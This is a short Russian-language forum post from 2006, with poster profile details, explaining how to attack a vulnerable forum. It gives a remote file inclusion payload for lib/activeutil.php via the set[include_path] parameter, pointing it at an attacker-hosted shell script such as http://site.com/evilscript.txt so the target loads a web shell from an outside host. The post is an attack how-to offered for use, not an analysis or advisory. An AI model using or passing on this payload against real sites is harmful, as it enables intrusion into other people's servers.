17.12.2006, 02:14
|
|
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817
Репутация:
112
|
|
О.o очень просто. Береш уязвимый форум и подставляеш в адресной строке:
lib/activeutil.php?set[include_path]="сайт с шеллом например rst"
Пример:
например есть сайт с форумом http://localhost
Там есть форум http://localhost/forum/
Пишем: http://localhost/forum/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?
|
|
|